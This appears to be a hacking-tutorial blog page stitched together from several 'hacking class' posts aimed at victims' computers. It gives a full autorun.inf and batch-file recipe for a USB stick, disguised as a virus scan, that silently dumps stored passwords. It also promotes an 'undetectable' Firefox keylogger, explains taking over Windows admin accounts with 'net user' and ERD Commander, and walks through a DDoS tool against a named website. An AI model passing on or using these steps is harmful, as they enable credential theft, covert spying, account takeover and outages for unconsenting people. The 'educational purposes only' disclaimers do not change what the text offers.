Header Ads

  • Breaking News

    Join the spark hacking Tools Discord Server! Check out the spark hacking Tools community on Discord - hang out with 1 other members and enjoy free voice and text chat.https://discord.gg/eTsYZp

    How to Sniff/Hack Passwords Using USB Drive??

    How to Sniff/Hack Passwords Using USB Drive??

    As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.
    MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
    Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
    Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
    IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
    Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
    PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 
    Here is a step by step procedre to create the password hacking toolkit.
    NOTE: You must temporarily disable your antivirus before following these steps.
    1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
    ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.
    2. Create a new Notepad and write the following text into it
    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan
    save the Notepad and rename it from
    New Text Document.txt to autorun.inf
    Now copy the autorun.inf file onto your USB pendrive.
    3. Create another Notepad and write the following text onto it.
    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start passwordfox.exe /stext passwordfox.txt
    save the Notepad and rename it from
    New Text Document.txt to launch.bat
    Copy the launch.bat file also to your USB drive.
    Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
    1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
    2. In the pop-up window, select the first option (Perform a Virus Scan).
    3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
    4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
    This hack works on Windows 2000, XP and Vista
    NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
    In this tutorial we will discuss How to hack the Passwords using the Keylogger. I will try to explain the all Possible methods of hacking passwords through keyloggers..

    Hacking through keyloggers Depends on the mode which you are using  i.e
    1. IF You have Physical access of the System(i.e college computers or Home PC etc..)
    2. IF you Don’t Have access to that system i.e Remote Computers etc..

    HACKING CLASS 13 - Password Cracking (Using Keyloggers)

    Why I am saying these two methods because keyloggers for remote computer are mostly detectable but few  are undetectable now also..I will try to provide the Best undetectable keyloggers with Easy to use Interface… So Guys Read On….

    First of all We Should Discuss basic Things About Keyloggers..i.e what are these , how they works, will i be caught doing this…and much more.. Starting From the Very First Question..

    1. What is a Keylogger?
    A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.
    2. How Keylogger works?
    Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes to http://www.gmail.com and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the Yahoo login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke.
    SAMPLE SNAPSHOTS OF KEYLOGGER DATA ..
    HACKING CLASS 13 - Password Cracking (Using Keyloggers)

    3. How to install the keylogger?
    A keylogger can be installed just like any other program. Just follow the screen instructions and you’re done.
    4. Do I need any special knowledge to install and use the keylogger?
    Absolutely NOT! Anyone with a basic computer knowledge can install and use the keylogger. It requires no special skills.
    5. Once I install the keylogger can the victim come to know about it’s presence?
    No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager. So the victim can no way identify it’s presence on his/her PC.
    6. Can I be traced back if I install the keylogger on some other computer?
    No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.

    NOW THE METHOD 1
    IF YOU HAVE THE PHYSICAL ACCESS OF THE COMPUTER..
    First of all As I have Hold in the Previous Hacking class 12 that You will Need the Admin Rights to install the Applications…Hacking the Admin Account has been already discussed in the Previous class… So Read that For Hacking Admin Account.
    Now You Have the Admin Rights or Previlages  Of the System… Best Method is to use the Inbuilt Keylogger of Firefox…
    Note: It generally works only in the versions previous than 3.1 But I hav Edited it  and Now It can Work with Later Versions also… So Don’t Work and Keep Using It..
    Why I am Telling this ??  Its simply because It is absolutely Undetectable… No Antivirus can Detect It (100% safe)..
    DOWNLOAD KEYLOGGER
    NOTE: IT ONLY WORKS WITH FIREFOX.. Its a Add on..

    HOW TO USE THIS INBUILT KEYLOGGER??
    Step 1 : Download The Keylogger.
    Step2: After Downloading Drag and Drop It into the Firefox. After Dragging You will See Something like This…
    HACKING CLASS 13 - Password Cracking (Using Keyloggers)

    Step 3: After That Click on Install And Then Restart the Firefox as Shown in Below Figure..
    HACKING CLASS 13 - Password Cracking (Using Keyloggers)

    STEP 4: After Restarting the Firefox .. Now Configure the Keylogger as Shown Below ..
    HACKING CLASS 13 - Password Cracking (Using Keyloggers)

    Go Tools –> Add Ons —> Extensions…. Then Something Like Below Will appear..
    HACKING CLASS 13 - Password Cracking (Using Keyloggers)

    Step 5 : Now Everything You type in the Web Browser Will be Recorded by the Keylogger… Itsn’t that Easy Like 123..
    Keep Enjoying…Here is sample Snapshot of Log of the Victim…
    HACKING CLASS 13 - Password Cracking (Using Keyloggers)


    This is all About Inbuilt keylogger of Firefox… 
    In Next class We will Discuss More things about Keyloggers… So keep Reading..
    IF YOU HAVE ANY QUERIES ! ASK ME !
    Sorry For So Much Delay Guys For This Class.. I was Pity Much Busy With Designing New Templates For My Website…Now I am Back With another awesome Hacking Class…
    Today We will Start Learning How To Hack The Systems Practically….So Read On…


    TOPICS TO BE COVERED IN HACKING SYSTEMS CLASSES:
    Hey Its a Brief Look That How We Will Proceed For hacking Systems!

    ~ Password cracking
    ~ Password attacks
    ~ Identifying various password cracking tools
    ~ Formulating countermeasures for password cracking
    ~ Getting privileges
    ~ Executing applications
    ~ Keyloggers and Spywares
    ~ Spywares and keyloggers countermeasures
    ~ Hiding files
    ~ Understanding rootkits
    ~ The use of Steganography
    ~ Covering tracks


    SO GUYS AS THE PATTERN SAYS TODAY WE WILL DISCUSS: CRACKING PASSWORD


    CRACKING PASSWORDS
    Hey Friends As we all Know Cracking Passwords is not an easy task.. Also the Chances of getting Exact Passwords are 40 out of 100….But I think this Tutorial will really Help you…


    FIRST OF ALL LET’S DISCUSS DIFFERENT PASSWORD TYPES:

    ~ Passwords that contain only letters
    Ex: HIJKLMNO
    ~ Passwords that contain only numbers
    Ex: 758904
    ~ Passwords that contain only special characters
    Ex: $@$!()
    ~ Passwords that contain letters and numbers
    Ex: ax1500g
    ~ Passwords that contain only letters and special characters
    Ex: m@roon$
    ~ Passwords that contain only special characters and numbers
    Ex: @$47$
    ~ Passwords that contain letters, special characters, and numbers
    Ex: E1n@8$


    Why We Discussed This is Pity Simple .. Its the Order of Difficulty for Cracking Passwords..


    DIFFERENT WAYS OF CRACKING THE PASSWORDS:
    1. Using Keyloggers 
    2. Social Engineering i.e Guessing
    3. OFFLINE attacks like Brute Force, Dictionary attack,Hybrid Attack
    4. Phising


    Now Thats All Are Further Things First of All People i.e must know what is admin password of the computer.


    SO Today We will Focus on Different Ways Of Hacking Admin Password of any system:


    HACKING ADMIN PASSWORDS 

    Here we will discuss 3 methods to Hack the Password of Admin:
    1. Simply accessing Unprotected Administrator Account.
    2. Hacking Through Net User Command.
    3. Hacking Using the ERD(Emergency Rescue Disk)  Commander.




    Now The MeThod 1:


    Accessing Unprotected Administrator Account


    Steps Involved:
    Step1: Start the Computer i.e Turn on the Computer.
    Step2: Now wait till the username window appears as shown below…
    How to hack Admin Account








    Step 3: As This Window Appears Press Ctrl+Alt +Delete (2 times).. Now the Windows like shown below appears..
    How to hack Admin Account







    Step4: Now as shown above Enter the Administrator on the Username box and press enter… Now you will be login in the admin account can easily rest the password…
    For Resetting password you can follow two Procedures..
    Procedure 1: Goto Start–>Control Panel–>User Accounts.. Now select the account whose password u want to reset.
    Procedure 2 : Follow the Next method i.e hacking password through Net User Command.

    Note: Hack 1 will only work if Administrator(default) is unsecured i.e User as some other username like above shown figure…


    METHOD 2:

    HACKING ADMIN ACCOUNT USING NET USER COMMAND
    Note: This will work only when user has access of user account or some how he has been allowed  or working in admin account.

    Steps Involved:
    Step1: Goto the Start and click on Run and Type cmd in it… 

    Step 2: Now type “net user” in the command prompt to obtain the All accounts on that computer.. as shown in figure..
    How to hack Admin Account









    Step 3: Now Select the account Which u want to Reset the Password…
    Suppose that we want to Reset the Password  of Administrator…
    Now Type “net user Administrator *  ” Without quotes… and press Enter. As shown in the Below Figure..

    How to hack Admin Account








    Step 4: Now after that press Enter Twice to rest the password. Now Next time u open that Account .. It will not require any Password..


    METHOD 3: (100% working Method on Any System)

    Hacking Admin Account Using ERD Commander

    First of all Download the ERD commander… Extract the Files and Make a CD…

    1. Insert the ERD Commander Boot CD into the drive and restart the system
    2. Boot the computer using ERD Commander Boot CD. You may have to set the boot order in the BIOS first.
    3. Select your Windows XP installation from the list
    How to hack Admin Account
    4. From the ERD Commander menu (Start menu), click System Tools and click Locksmith
    How to hack Admin Account

    5. Click Next

    How to hack Admin Account

    6. Select the administrator account from the list for which you want to reset the password.
    How to hack Admin Account

    7. Type the new password in both the boxes, click Next and click Finish

    How to hack Admin Account

    8 . Restart The System and take the CD out of the Drive..And Enjoy Admin account…

    I hope You all have Liked This… If you have Any Queries ask me…
    Hello Friends I am Back with another Rocking Class … I know you all were in illusions that Website hacking and Attacking is very Difficult and only some hackers and professionals can Do It… Now that’s absolutely wrong thinking… Its as Easy as abcdefg… 
    In Todays Class I will Explain Stepwise How to Attack Websites , Turn Down Websites Temporarily and my cause serious damage to them… Also Editing Websites We will Continue in Next phase…:P

    NOTE: THIS IS FOR EDUCATIONAL PURPOSES ONLY… I AND ISOFTDL.COM IS NOT RESPONSIBLE FOR ANY MISUSE…

    First of all We all should know What are the Different Methods Of attacking Websites…
    There are Generally Three Methods of Attacking an Website…
    1. Ddos Attack
    2. Shell Scripts Attack
    3. Javascript Attack or Attack through Scripting.

    Note: SQL and other techniques comes in the Hacking Websites Part Not in attacking Part. Attacking is simply for fun or intentionally causing damage to the Website.. 

    1. Ddos Attack
    Hacking Class 11 - Attacking Websites(Ddos Attack)









    What is a Distributed Denial of Service (DDoS) attack?
    Have you ever tried to make a telephone call but couldn’t because all the telephone circuits were busy? This may happen on a major holiday and often happens on Diwali,New year etcc…
    The reason you couldn’t get through is because the telephone system is designed to handle a limited number of calls at a time. 
    So upto now you will Got an Idea What is Ddos(Distibuted Denial of Service) Attack.
    Basically Ddos attack is an attack which makes the Network So congested such that no further Requests are delivered.
    This is Done by making a number of connections to the Websites through Different Computer or Networks. Also can be done from One Computer by making Connections through Different Ports as there are 64k ports available in Windows OS… :P

    How Attacker Launch a Ddos Attack??

    Later i will explain it With using simple Software: Server Attack Pro. Thsi is for Knowledge Only.


    First, Attackers build a network of computers that will be used to produce the volume of traffic needed to deny services to computer users. We’ll call this an attack network.
    To build this attack network, Attackers look for computers that are poorly secured, such as those that have not been properly patched, or those with out-of-date or non-existent anti-virus software. When the Attackers find such computers, they install new programs on the computers that they can remotely control to carry out the attack.

    These days, however, the process of building an attack network has been automated through self-propagating programs. These programs automatically find vulnerable computers, attack them, and then install the necessary programs. The process begins again as those newly compromised computers look for still other vulnerable computers. 

    Once an attack network is built, the intruder is ready to attack the chosen victim or victims. Some information security experts believe that many attack networks currently exist and are dormant, passively waiting for the command to launch an attack against a victim’s computers. Others believe that once a victim has been identified, the attack network is built and the attack launched soon afterward.


     DdoS Attack Through Tools: Server Attack Pro
    THis tool is for Demonstration plz don’t misuse…!!
    I am not Responsible for it
    DOWNLOAD

    Please Don’t Misuse It….



    HOW TO USE SERVER ATTACK SOFTWARE ??

    Steps:
    1. Extract the Rar File to Obtain the Following Files..
    Hacking Class 11 - Attacking Websites(Ddos Attack)








    2. Launch The Program as Shown Below..
    Hacking Class 11 - Attacking Websites(Ddos Attack)
    3. Now Suppose You want to attack www.amulive.com (Educational Purpose Only). Type the website name In Server Address. And click on Start…
    Hacking Class 11 - Attacking Websites(Ddos Attack)
    4. Now When Attack Is Complete … There is something Like This…
    Hacking Class 11 - Attacking Websites(Ddos Attack)
    5. Now The Server Is Down and It Will Remain Down Till the Software Runs On your System…Please Don’t Misuse It….
    6.Now You can Check Site cannot be Opened . Not Only my system but from any system. … LOL..:P
    LIMITATIONS OF SOFTWARE:
    1. Cant be Used against Big Servers like facebook,orkut,gmail,google etc…
    2. Small Scale Sites and colleges sites and Bux Sites Easily Targeted….
    3. For Some Site You may Need the Software to Run from 2 to 3 computers or more…
    PRECAUTIONS FOR WEBMASTERS !
    Don’t Worry Friends (WebMaster’s ) My Next Post Will Be How TO Prevent The Ddos Attacks… And Make your Site Never Suffer From These Attacks…So Keep Reading..
    If You Have Any Queries ! Please Comment . I will Help You Out!

    No comments

    Post Top Ad

    Post Bottom Ad